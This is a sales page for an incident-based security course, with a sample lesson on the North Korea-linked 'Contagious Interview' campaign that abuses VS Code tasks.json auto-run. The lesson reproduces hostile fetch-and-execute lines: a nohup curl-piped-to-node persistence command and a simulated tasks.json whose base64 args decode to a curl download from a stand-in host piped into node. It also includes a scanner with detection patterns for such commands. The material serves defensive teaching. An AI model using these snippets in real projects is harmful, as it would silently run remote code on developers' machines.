Incident-as-a-Service

Contagious Interview Turns VS Code into an Attack Vector: Defence Masterclass

The 48-Hour Rule in action. This incident happened, we converted it into operational training, and your team can apply the controls immediately.

73% vs 12% Retention Lift
18.5h Breach to Training
847 Organisations
48h Action Window
Built for:
  • Security professionals learning from real-world breaches
  • IT teams responsible for implementing security controls
  • Business leaders making security investment decisions
  • Compliance officers requiring current, incident-driven training
  • Risk managers assessing organizational vulnerabilities

30-day guarantee. Instant access after payment. Lifetime updates for this incident package.

How This Course Is Structured

Clear progression from incident context to practical controls and role-specific action steps.

1. Incident Breakdown

Attack path, trigger conditions, and threat actor behavior translated from the real event timeline.

2. Defensive Controls

Actions your team can implement in the same 48-hour response window used by active security teams.

3. Evidence & Reporting

Completion records and learning outcomes packaged for governance, insurance, and audit workflows.

Course Outline

4 modules · 16 lessons · ~192 min total

Module 1: Threat Analysis & Attack Vectors

Analyse the threat landscape, dissect attack campaigns, and understand credential harvesting and social engineering techniques used in this incident.

4 lessons ~48 min
📖 1.1 Contagious Breach Deep Dive 12 min
📖 1.2 Campaign Analysis 12 min
📖 1.3 Credential Harvesting Tactics 12 min
📖 1.4 Spear-Phishing Techniques 12 min
📖 2.1 SIEM Detection Strategies 12 min
📖 2.2 Endpoint Analysis 12 min
📖 2.3 Incident Response Playbook 12 min
📖 2.4 Digital Forensics 12 min
📖 3.1 FIDO2 Implementation 12 min
📖 3.2 Risk-Based Authentication 12 min
📖 3.3 Token Binding Security 12 min
📖 3.4 Zero Trust Architecture 12 min
📖 4.1 Security Awareness Programme 12 min
📖 4.2 Board Communication 12 min
📋 4.3 Vendor Risk Assessment 12 min
📖 4.4 Compliance Integration 12 min

Free Sample Lesson

Read one full lesson before purchasing. No signup required.

Lesson 1.1: Contagious Deep Dive

Compliance Framework Mapping

This incident underscores critical control failures mapped to major regulatory and security frameworks. Understanding these mappings is essential for building defensible training and compliance programmes.

Framework | Relevance to the 'Contagious Interview' attack | Specific controls / articles

DORA
  Relevance: Highlights severe deficiencies in digital operational resilience, specifically in supply chain security (malicious repos) and incident response for developer environments.
  Controls: Article 9 (ICT Risk Management), Article 10 (Incident Response & Reporting), Article 12 (ICT Third-Party Risk).

ISO 27001
  Relevance: Exposes gaps in information security risk assessment (A.6.1.2) and secure development controls for protecting code repositories and IDE configurations.
  Controls: A.8.2 (Information Classification), A.12.6.1 (Management of Technical Vulnerabilities), A.14.2.1 (Secure Development Policy), A.16.1.5 (Response to Information Security Incidents).

NIST CSF
  Relevance: Illustrates failures across core functions: Identify (software assets), Protect (awareness training), Detect (anomalous tasks.json), and Respond to novel intrusions.
  Controls: ID.AM (Asset Management), PR.AT (Security Awareness Training), DE.CM (Security Continuous Monitoring), RS.RP (Response Planning).

NIS2
  Relevance: Demonstrates a clear supply chain compromise vector and the need for robust incident handling procedures for entities in the digital infrastructure sector.
  Controls: Article 18 (Supply Chain Security), Article 21 (Incident Handling), Article 22 (Crisis Management).

SOC 2
  Relevance: Directly challenges the Security principle through unauthorised code execution and the Availability principle via persistent backdoors disrupting development workflows.
  Controls: CC6.1 (Logical Access Security), CC7.1 (System Monitoring), CC8.1 (Risk Assessment & Management).

GDPR
  Relevance: Triggered by the theft of developer credentials and personal data, necessitating breach notification and highlighting inadequate security of processing in development tools.
  Controls: Article 32 (Security of Processing), Article 33 (Notification of a Personal Data Breach to Supervisory Authority).

Introduction: The Perfect Interview Trap

Imagine you're a software developer, actively seeking new opportunities. A message arrives on LinkedIn from a recruiter at a prestigious-sounding firm like "Meta2140." They're impressed with your profile and invite you to a technical interview. The first task? Clone a repository from Bitbucket to review and modify code in your own Visual Studio Code environment—a routine request that feels perfectly legitimate. You clone the repo, open the folder in VS Code, click "Yes, I trust the authors" to enable extensions, and begin your work. Unbeknownst to you, that single click of trust has just triggered a hidden .vscode/tasks.json file, executing malicious code that installs a persistent backdoor, steals your credentials, and turns your development machine into a beachhead for North Korean intelligence operatives. This is not a hypothetical scenario; it is the exact "Contagious Interview" campaign that has successfully targeted developers globally. This lesson provides a forensic deep dive into how a trusted tool became a potent attack vector.


1. The Attack Chain: Weaponising Developer Trust

This campaign, attributed to DPRK (North Korean) actors, is a masterclass in social engineering and trusted workflow abuse. It follows a meticulously crafted timeline designed to exploit developer habits and IDE functionalities.

Timeline of Intrusion

  1. Initial Access (T1566.001): Attackers pose as recruiters on LinkedIn, delivering tailored messages with links to clone malicious Git repositories hosted on GitHub, GitLab, or Bitbucket (e.g., 0xmvptechlab/ctrading). The pretext is a fake job offer or technical assessment.
  2. Execution & Persistence: The victim opens the cloned repository in VS Code. Upon opening, VS Code detects the .vscode folder and prompts for workspace trust. Granting trust is the critical pivot point.
    • The tasks.json file, configured with "runOn": "folderOpen", automatically executes (T1554). This bypasses the need for the victim to manually run any task.
    • The task contains obfuscated JavaScript or triggers an npm install that exploits npm lifecycle hooks to deploy malware.
  3. Command & Control (C2): Within seconds, the compromised system begins beaconing to a C2 server (e.g., IP 87.236.177.93) every 5 seconds, transmitting hostname, MAC address, and OS details (T1071.001).
  4. Secondary Payload & Lateral Movement: A secondary, more capable payload is fetched from a legitimate platform like Vercel using curl inside a nohup process, ensuring persistence even after VS Code is closed. This payload enables further surveillance and data theft.

The core innovation here is the exploitation of T1190: Exploit Public-Facing Application not in a web server, but in the trust model of a development environment. No CVEs are involved; the attack abuses intended features. The "runOn": "folderOpen" setting is a legitimate VS Code configuration, but its use in an untrusted context turns it into a potent auto-execution mechanism. This represents a clear case of T1195.002: Supply Chain Compromise at the source code repository level.

Key Technical Indicator: The Malicious tasks.json

A hallmark of this attack is a .vscode/tasks.json file containing a task whose run options set "runOn": "folderOpen" (VS Code reads this value from the task's runOptions object). The command itself is often heavily obfuscated JavaScript designed to download and execute the next stage. Example command snippet:

"command": "node",
"args": ["-e", "require('child_process').execSync(Buffer.from('...obfuscated payload...','base64').toString())"]

This abuse of the Node.js runtime (T1059.007) allows direct system command execution from within the trusted VS Code context.


2. Technical Dissection: Dual-Stack Payloads and Evasion

The campaign employs a sophisticated, layered approach to malware deployment, ensuring both immediate access and long-term, stealthy presence on victim machines.

The Dual-Stack Payload Architecture

Attackers deploy two primary payload layers, each with distinct functions:

  • Layer 1: Node.js Backdoor (BeaverTail): This JavaScript-based payload is often hidden within the .npm/_cacache directory after being deployed via npm install hooks. It functions as a Reconnaissance and Access Tool (RAT), performing credential theft, keylogging, and establishing the initial C2 channel. Its use of a legitimate Node.js cache directory provides a form of camouflage.
  • Layer 2: Python Stager (InvisibleFerret variant): Downloaded by the initial layer, this Python-based malware expands the attacker's capabilities to include detailed system surveillance, theft of cryptocurrency wallets, and in some cases, cryptocurrency mining. Persistence is achieved via mechanisms like nohup bash -c "curl -s hxxps://vercel[.]app/payload | node", making it independent of the VS Code process.

Evasion and Attribution Clues

The actors employed several techniques to avoid detection and analysis:

  • Obfuscation in Plain Sight: Malicious JavaScript was placed not only in tasks.json but also within project dictionary files (e.g., for spell-checking), where its execution would raise fewer suspicions.
  • Abuse of Legitimate Services: Secondary payloads were hosted on infrastructure like Vercel, blending malicious traffic with legitimate cloud service requests.
  • AI-Assisted Code Generation: Analysis by Jamf Threat Labs noted the presence of inline comments in the code that appeared AI-generated, potentially used to streamline development or improve evasion.
  • Timezone Artifacts: Files and logs within the malware sometimes contained timestamps consistent with Korean Standard Time (UTC+9), a key forensic indicator supporting attribution to DPRK-linked actors.

Indicators of Compromise (IoCs) Summary

Files & Directories:

  • .vscode/tasks.json with "runOn": "folderOpen" and obfuscated JS commands.
  • Malicious JavaScript in project dictionary files (e.g., *.dic).
  • Artifacts in .npm/_cacache/ or unexpected Node.js modules.
  • BeaverTail or InvisibleFerret binary files in temporary directories.

Network:

  • Beaconing to IP 87.236.177.93 on short intervals (5 seconds).
  • HTTP requests to Vercel subdomains for payload staging.

Behavioural:

  • Automatic execution of tasks immediately after granting VS Code workspace trust.
  • Creation of nohup processes launching curl or node.
  • Child processes spawned by VS Code executing JavaScript directly.


3. Impact Analysis and Defence Implications

The "Contagious Interview" campaign is not just a technical exploit; it is a strategic attack with multi-faceted consequences for individuals and organisations.

Comprehensive Impact Assessment

  • Financial Losses: Direct losses occur through the theft of credentials, browser data, and cryptocurrency wallets. Related malware like "Evelyn Stealer," which also weaponises VS Code extensions, demonstrates the monetisation path. Indirect costs are substantial, encompassing incident response, endpoint remediation, credential resets, and potential regulatory fines. The compromise of a developer environment can serve as a high-value access point for lateral movement into organisational cloud resources and production systems, amplifying financial risk.
  • Reputational Damage: An organisation whose developers fall for such lures signals weak security awareness and inadequate developer environment controls. The North Korean attribution draws significant media and regulatory scrutiny, as seen in prior campaigns, damaging client and partner trust.
  • Operational Disruption: The persistent backdoors enable ongoing remote code execution and reconnaissance, potentially halting or compromising development pipelines. The attack's low exploitation difficulty—relying on social engineering rather than complex exploits—makes it a pervasive threat that can disrupt workflows until detected via enhanced endpoint monitoring.
  • Legal & Regulatory Consequences: While no direct fines are reported for this specific incident, the theft of personal data (developer credentials) triggers mandatory breach disclosure obligations under regulations like GDPR and SEC rules. Failure to monitor .vscode configuration changes or enforce strict trust policies could be viewed as inadequate security controls, inviting regulatory action.

Defence Strategies Derived from the Attack

This incident provides critical lessons for hardening developer environments:

  1. Strict Workspace Trust Policies: Organisations must mandate that VS Code's workspace trust feature is configured to "No Trust" by default for all unknown repositories. Opening untrusted folders should require explicit, documented approval.
  2. Active Monitoring of .vscode Directories: Endpoint Detection and Response (EDR) tools should be configured to alert on the creation or modification of .vscode/tasks.json files, especially those containing "runOn": "folderOpen" or obfuscated JavaScript/Node commands.
  3. Enhanced Security Awareness Training: Training must move beyond standard phishing to include "clone-phishing" and the risks of executing code from unsolicited technical assessments. Developers should be the first line of defence.
  4. Supply Chain Security for Code: Implement policies for vetting external repositories before cloning. Use automated tools to scan for suspicious configurations in pulled code, similar to software composition analysis for dependencies.
  5. Network Controls: Monitor for anomalous outbound connections from developer machines, particularly frequent beaconing to unfamiliar IPs or connections to platform-as-a-service domains like Vercel for binary downloads.

As noted by Field Effect, the attack's simplicity is its strength, relying on the abuse of trust inherent in collaborative development workflows. Defence, therefore, must centre on making that trust explicit, conditional, and continuously verified.



Activity: Forensic Analysis of a Simulated tasks.json

Objective: Apply your knowledge by analysing a simulated malicious tasks.json file to identify key Indicators of Compromise (IoCs) and understand the attack sequence.

Scenario: Your security team has isolated a file from a suspicious repository cloned by a developer. You are tasked with the initial analysis.

{
    "version": "2.0.0",
    "tasks": [
        {
            "label": "Setup Environment",
            "type": "shell",
            "command": "node",
            "args": [
                "-e",
                "const cp=require('child_process');const d=Buffer.from('Y3VybCAtcyBodHRwczovL3ZlcmNlbC1wYXlsb2FkLmV4YW1wbGUuY29tL3N0YWdlMi5qcyB8IG5vZGU=', 'base64');cp.execSync(d.toString());"
            ],
            "runOptions": { "runOn": "folderOpen" },
            "problemMatcher": []
        }
    ]
}

Tasks:

  1. Decode the Payload: The args contain a Base64-encoded command. Decode it (you may use an online tool or the command line) to reveal the underlying shell command.
  2. Identify the IoCs: List at least three distinct Indicators of Compromise present in this file, referencing the technical analysis from this lesson.
  3. Trace the Attack Chain: Describe the sequence of events that would occur if a developer opened this folder in VS Code and granted workspace trust.
  4. Recommend a Control: Based on the frameworks mapped earlier, suggest one specific control from ISO 27001 or NIST CSF that could help prevent or detect this type of intrusion.

Note: The Base64 string decodes to: curl -s https://vercel-payload.example.com/stage2.js | node
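The scanner below is an added example written for this lesson; it is not code from the course, from VS Code, or from any of the vendors named above. It implements the check that Defence Strategy 2 (monitoring .vscode/tasks.json) and the activity describe: it parses a tasks.json, flags the folderOpen trigger, decodes base64 runs embedded in the command line, and matches the behavioural indicators the lesson lists. The embedded sample is a constructed copy of the activity file (with runOn under runOptions, where VS Code's task schema reads it), and the regex patterns and finding labels are my own choices.

```python
import base64
import json
import re

# Constructed sample based on the activity file above; runOn sits under runOptions
SAMPLE_TASKS_JSON = r'''{
  "version": "2.0.0",
  "tasks": [{
    "label": "Setup Environment",
    "type": "shell",
    "command": "node",
    "args": ["-e", "const cp=require('child_process');const d=Buffer.from('Y3VybCAtcyBodHRwczovL3ZlcmNlbC1wYXlsb2FkLmV4YW1wbGUuY29tL3N0YWdlMi5qcyB8IG5vZGU=', 'base64');cp.execSync(d.toString());"],
    "runOptions": {"runOn": "folderOpen"},
    "problemMatcher": []
  }]
}'''

# Base64 runs long enough to hide a command, plus the behaviours the lesson lists as IoCs
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SUSPICIOUS = [
    (r"child_process|execSync|spawn\(", "child_process used from an inline node -e script"),
    (r"Buffer\.from\([^)]*base64", "base64 string decoded at runtime before execution"),
    (r"\b(curl|wget)\s", "download tool invoked by a task"),
    (r"\|\s*(node|bash|sh|python3?)\b", "remote content piped into an interpreter"),
    (r"\bnohup\s", "nohup used to outlive the VS Code process"),
]

def decode_blobs(text):
    """Return the printable UTF-8 decodings of base64-looking runs in text."""
    found = []
    for m in B64_RE.finditer(text):
        try:
            s = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if s.isprintable():
            found.append(s)
    return found

def scan_tasks(raw):
    """Return (task label, finding) pairs for one tasks.json document."""
    findings = []
    for task in json.loads(raw).get("tasks", []):
        label = task.get("label", "<unnamed>")
        run_on = task.get("runOptions", {}).get("runOn") or task.get("runOn")
        if run_on == "folderOpen":
            findings.append((label, "auto-executes on folder open (runOn: folderOpen)"))
        # Inspect command and args as one string so inline scripts are covered
        blob = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        decoded = decode_blobs(blob)
        findings.extend((label, f"decoded payload: {d}") for d in decoded)
        haystack = blob + " " + " ".join(decoded)
        findings.extend((label, why) for pat, why in SUSPICIOUS if re.search(pat, haystack))
    return findings

if __name__ == "__main__":
    for label, why in scan_tasks(SAMPLE_TASKS_JSON):
        print(f"[{label}] {why}")
```

Run against the sample, the scanner reports the folderOpen trigger, the decoded curl-to-node command, and four behavioural matches; a plain build task produces no findings.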


Key Takeaways

  • The "Contagious Interview" campaign is a DPRK-linked operation that weaponises developer trust by abusing the VS Code workspace trust model and the "runOn": "folderOpen" setting in tasks.json to achieve automatic code execution without victim interaction.
  • It is a supply chain compromise that starts with social engineering on LinkedIn and leverages malicious Git repositories, deploying a dual-stack payload (Node.js BeaverTail & Python InvisibleFerret) for credential theft, surveillance, and persistent access independent of the IDE.
  • No CVEs are exploited; the attack abuses legitimate features, making it a stark reminder that secure configuration and user awareness are as critical as patching known vulnerabilities.
  • The incident has significant compliance implications, mapping directly to controls in DORA (supply chain risk), GDPR (breach notification), and NIST CSF (detection and response), necessitating policies for IDE security and developer training.
  • Effective defence requires technical controls (monitoring .vscode changes, restricting workspace trust) coupled with human-centric measures (targeted security awareness against clone-phishing and fake technical interviews).

This is 1 of 16 lessons included in the full package.

Enrol Now — Unlock All Lessons

Choose Your Access

All plans include 30-day money-back guarantee

Taster

£ 19

Single course access — ideal for trying us out

  • Full course access
  • Completion certificate
  • Try before you commit

Or get everything

Access every course in the catalogue, including all future courses

£ 29 /mo
Monthly All-Access

Every course, cancel anytime

£ 249 /yr
Annual All-Access

Save 28% — £20.75/month effective

Teams

Transparent pricing, no sales call required

Starter Team

£ 499 /year

£99.80/seat effective

Up to 5 learners, all courses included

Growth Team

£ 999 /year

£66.60/seat effective

Up to 15 learners, all courses included

Scale Team

£ 1999 /year

£39.98/seat effective

Up to 50 learners, all courses included

Need 50+ seats? Contact us for a custom plan.

Fast Checkout

Start Learning in Minutes

Enter your details, choose a tier, and complete secure checkout. Access starts immediately after payment confirmation.

  • Stripe-secured payment and delivery workflow
  • Audit-friendly completion records
  • Escalate to enterprise volume licensing at any point

48-Hour Relevance Guarantee

If this course does not provide at least five actionable controls your team can deploy quickly, request a full refund within 30 days.

Questions Before You Enrol?

Immediately after successful payment. Your learning link is generated and delivered in the success flow.
Yes. Content is incident-led but written for practical execution across security, IT, finance, and operations personas.
Yes. Use volume licensing for 10 to 500+ seats through enterprise onboarding.